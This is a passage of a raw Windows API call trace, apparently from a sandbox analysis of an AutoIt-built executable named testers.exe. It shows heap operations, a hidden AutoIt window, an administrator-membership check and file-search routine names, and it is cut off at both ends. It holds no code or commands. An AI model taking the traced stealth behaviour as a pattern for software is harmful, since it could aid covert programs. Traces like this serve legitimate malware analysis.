(HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3ea8 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3ec0 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3ed8 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3f18 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3f30 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa6f0 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa7b0 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa798 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa780 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa810 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa7c8 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa7e0 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa870 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa828 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa840 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa8d0 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa8b8 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa888 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa918 | out: hHeap=0xb80000) returned 1 [0265.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa900 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa8e8 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa930 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa948 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa9a8 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa960 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa978 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa9c0 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa9d8 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa38 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa9f0 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa08 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa50 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa68 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3558 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa80 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa98 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3570 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3588 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35d0 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35b8 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35a0 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35e8 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3600 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3660 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3618 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3630 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3678 | out: hHeap=0xb80000) returned 1 [0265.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3690 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36d8 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36c0 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36a8 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3738 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3720 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36f0 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3780 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3768 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3750 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3798 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37b0 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37c8 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37e0 | out: hHeap=0xb80000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37e0 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb37c8 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3160 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37c8 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3160 | out: hHeap=0xb80000) returned 1 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37e0 | out: hHeap=0xb80000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37e0 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x14) returned 0xbaa628 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb37c8 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6610 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3160 [0265.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa628 | out: hHeap=0xb80000) returned 1 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37b0 [0265.822] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3798 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37c8 | out: hHeap=0xb80000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37c8 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6688 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3750 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3768 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3780 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb36f0 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37e0 | out: hHeap=0xb80000) returned 1 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3798 | out: hHeap=0xb80000) returned 1 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37b0 | out: hHeap=0xb80000) returned 1 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37c8 | out: hHeap=0xb80000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x6) returned 0xbb3170 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb37c8 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3180 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37c8 | out: hHeap=0xb80000) returned 1 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3170 | out: hHeap=0xb80000) returned 1 [0265.823] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37c8 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37b0 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3798 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb37e0 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3170 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb37b0 | out: hHeap=0xb80000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37b0 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3720 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3798 | out: hHeap=0xb80000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3798 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3180 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3738 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb36a8 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3190 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb36c0 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb36d8 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3738 | out: hHeap=0xb80000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa) returned 0xbb3738 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3690 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3180 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3690 | out: hHeap=0xb80000) returned 1 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3738 | out: hHeap=0xb80000) returned 1 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3738 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xe) returned 0xbb3690 [0265.824] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3678 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3180 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3678 | out: hHeap=0xb80000) returned 1 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3690 | out: hHeap=0xb80000) returned 1 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3690 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x12) returned 0xbaa628 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba66b0 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3180 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba66b0 | out: hHeap=0xb80000) returned 1 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.825] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa628 | out: hHeap=0xb80000) returned 1 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3678 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3630 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3618 [0265.825] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3660 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3600 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35e8 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2) returned 0xbb3180 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb35a0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb35b8 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb31a0 [0265.826] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3180 | out: hHeap=0xb80000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35d0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3588 [0265.826] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35a0 | out: hHeap=0xb80000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35a0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3570 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x3c) returned 0xb922d0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3558 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3f48 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3f60 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3f78 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3f90 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3fa8 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3fc0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3fd8 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3ff0 [0265.826] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb4008 [0265.841] IUnknown:Release (This=0xba6520) returned 0x0 [0265.841] FreeLibrary (hLibModule=0x290000) returned 1 [0265.841] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99250 | out: hHeap=0xb80000) returned 1 [0265.841] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99238 | out: hHeap=0xb80000) returned 1 [0265.841] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3940 | out: hHeap=0xb80000) returned 1 [0265.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x75f9f8, lpFilePart=0x77fa18 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x77fa18*="testers.exe") returned 0x2f [0265.842] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x74f9d8, lpFilePart=0x75f9dc | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x75f9dc*="testers.exe") returned 0x2f [0265.842] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba54b0 | out: hHeap=0xb80000) returned 1 [0265.842] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xba54c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x75f9e4 | out: IsMember=0x75f9e4) returned 1 [0265.843] GetSysColorBrush (nIndex=15) returned 0x1100059 [0265.843] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0265.843] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x1c0181 [0265.844] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x1d014b [0265.844] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x18016b [0265.845] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x190145 [0265.846] RegisterClassExW (param_1=0x75f9b4) returned 0xc125 [0265.846] GetSysColorBrush (nIndex=15) returned 0x1100059 [0265.846] RegisterClassExW (param_1=0x75f958) returned 0xc121 [0265.846] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0265.846] InitCommonControlsEx (picce=0x75f988) returned 1 [0265.847] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xbbcbd0 [0265.847] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x80179 [0265.848] ImageList_ReplaceIcon (himl=0xbbcbd0, i=-1, hicon=0x80179) returned 0 [0265.850] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x60172 [0265.850] NtdllDefWindowProc_W () returned 0x0 [0265.851] NtdllDefWindowProc_W () returned 0x1 [0265.853] NtdllDefWindowProc_W () returned 0x0 [0265.879] SetTimer (hWnd=0x60172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0265.879] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0265.879] CreatePopupMenu () returned 0x1b0163 [0265.880] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x60172, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x9016e [0265.894] NtdllDefWindowProc_W () returned 0x0 [0265.894] ShowWindow (hWnd=0x60172, nCmdShow=0) returned 0 [0265.894] ShowWindow (hWnd=0x60172, nCmdShow=0) returned 0 [0265.894] Shell_NotifyIconW (dwMessage=0x0, lpData=0x75f630) returned 1 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbbd660 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.923] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75f260) returned 1 [0265.923] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbd660 | out: hHeap=0xb80000) returned 1 [0265.923] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.923] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.923] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xc89c70 [0265.923] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0265.923] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89c70 | out: hHeap=0xb80000) returned 1 [0265.923] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.923] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.923] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.924] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.924] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.924] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.924] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.924] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.924] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.924] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.924] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.924] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.924] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.924] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: hHeap=0xb80000) returned 1 [0265.925] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xc95cf0 [0265.925] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9ee10 [0265.925] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9ee10 | out: hHeap=0xb80000) returned 1 [0265.925] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95cf0 | out: 